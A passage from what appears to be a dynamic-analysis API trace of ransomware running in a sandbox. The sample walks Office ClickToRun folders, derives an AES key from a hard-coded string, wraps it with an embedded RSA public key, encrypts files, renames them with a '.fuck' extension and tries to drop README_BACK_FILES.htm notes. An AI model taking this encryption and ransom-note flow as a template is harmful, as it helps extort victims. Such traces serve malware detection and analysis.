KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----6", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.010] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.010] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2882d00) returned 1 [0239.012] CryptImportPublicKeyInfo (in: hCryptProv=0x2882d00, dwCertEncodingType=0x1, pInfo=0x2895e50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2895e80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2895e88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893ab0) returned 1 [0239.012] CryptEncrypt (in: hKey=0x2893ab0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.012] CryptEncrypt (in: hKey=0x2893ab0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2883470*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2883470*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.012] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2883470, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.012] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.012] CryptEncrypt (in: hKey=0x2893d30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.012] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.012] CloseHandle (hObject=0xffffffff) returned 1 [0239.012] CloseHandle (hObject=0xffffffff) returned 1 [0239.012] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash"), bFailIfExists=0) returned 0 [0239.013] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash", dwFileAttributes=0x0) returned 0 [0239.013] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash.gsg")) returned 0 [0239.014] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash.fuck")) returned 0 [0239.014] CryptDestroyHash (hHash=0x2894130) returned 1 [0239.015] CryptDestroyKey (hKey=0x2893d30) returned 1 [0239.015] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0239.015] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.015] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.015] GetLastError () returned 0x5 [0239.015] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat")) returned 0x20 [0239.015] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x80) returned 0 [0239.016] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.016] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.016] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0239.017] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0239.019] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.019] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.019] CryptHashData (hHash=0x2893c70, pbData=0x2884dc8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.019] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893c70, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893cf0) returned 1 [0239.019] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----6", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.020] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.020] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2882d88) returned 1 [0239.020] CryptImportPublicKeyInfo (in: hCryptProv=0x2882d88, dwCertEncodingType=0x1, pInfo=0x2896e90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896ec0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896ec8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893df0) returned 1 [0239.020] CryptEncrypt (in: hKey=0x2893df0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.020] CryptEncrypt (in: hKey=0x2893df0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2882e10*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2882e10*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.020] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2882e10, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.020] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.021] CryptEncrypt (in: hKey=0x2893cf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.021] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.021] CloseHandle (hObject=0xffffffff) returned 1 [0239.021] CloseHandle (hObject=0xffffffff) returned 1 [0239.021] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat"), bFailIfExists=0) returned 0 [0239.021] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x0) returned 0 [0239.022] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat.gsg")) returned 0 [0239.022] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.man.dat.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.man.dat.fuck")) returned 0 [0239.023] CryptDestroyHash (hHash=0x2893c70) returned 1 [0239.023] CryptDestroyKey (hKey=0x2893cf0) returned 1 [0239.023] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0239.023] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0239.023] FindClose (in: hFindFile=0x2893e70 | out: hFindFile=0x2893e70) returned 1 [0239.023] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\readme_back_files.htm")) returned 0xffffffff [0239.023] AreFileApisANSI () returned 1 [0239.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287fb98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 126 [0239.023] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.024] GetLastError () returned 0x5 [0239.024] GetLastError () returned 0x5 [0239.024] FindNextFileA (in: hFindFile=0x28940f0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.024] FindClose (in: hFindFile=0x28940f0 | out: hFindFile=0x28940f0) returned 1 [0239.024] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\readme_back_files.htm")) returned 0xffffffff [0239.024] AreFileApisANSI () returned 1 [0239.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287fb98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 116 [0239.024] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.025] GetLastError () returned 0x5 [0239.025] GetLastError () returned 0x5 [0239.025] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.025] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2893e30 [0239.025] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.025] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.025] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2893eb0 [0239.027] FindNextFileA (in: hFindFile=0x2893eb0, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.027] FindNextFileA (in: hFindFile=0x2893eb0, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.027] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.027] GetLastError () returned 0x5 [0239.027] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml")) returned 0x20 [0239.027] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.028] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.028] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.028] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.029] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0239.031] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.031] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.031] CryptHashData (hHash=0x2893e70, pbData=0x2885098, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.031] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893e70, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28940f0) returned 1 [0239.032] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.032] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.032] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2882e98) returned 1 [0239.032] CryptImportPublicKeyInfo (in: hCryptProv=0x2882e98, dwCertEncodingType=0x1, pInfo=0x2896400*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896430*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896438*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893b30) returned 1 [0239.032] CryptEncrypt (in: hKey=0x2893b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.032] CryptEncrypt (in: hKey=0x2893b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28832d8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28832d8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.033] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28832d8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.033] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.033] CryptEncrypt (in: hKey=0x28940f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.033] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.033] CloseHandle (hObject=0xffffffff) returned 1 [0239.033] CloseHandle (hObject=0xffffffff) returned 1 [0239.033] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml"), bFailIfExists=0) returned 0 [0239.033] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.034] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml.gsg")) returned 0 [0239.034] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\MasterDescriptor.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\masterdescriptor.en-us.xml.fuck")) returned 0 [0239.035] CryptDestroyHash (hHash=0x2893e70) returned 1 [0239.035] CryptDestroyKey (hKey=0x28940f0) returned 1 [0239.035] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0239.035] FindNextFileA (in: hFindFile=0x2893eb0, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.035] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.035] GetLastError () returned 0x5 [0239.035] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash")) returned 0x20 [0239.035] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash", dwFileAttributes=0x80) returned 0 [0239.036] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all 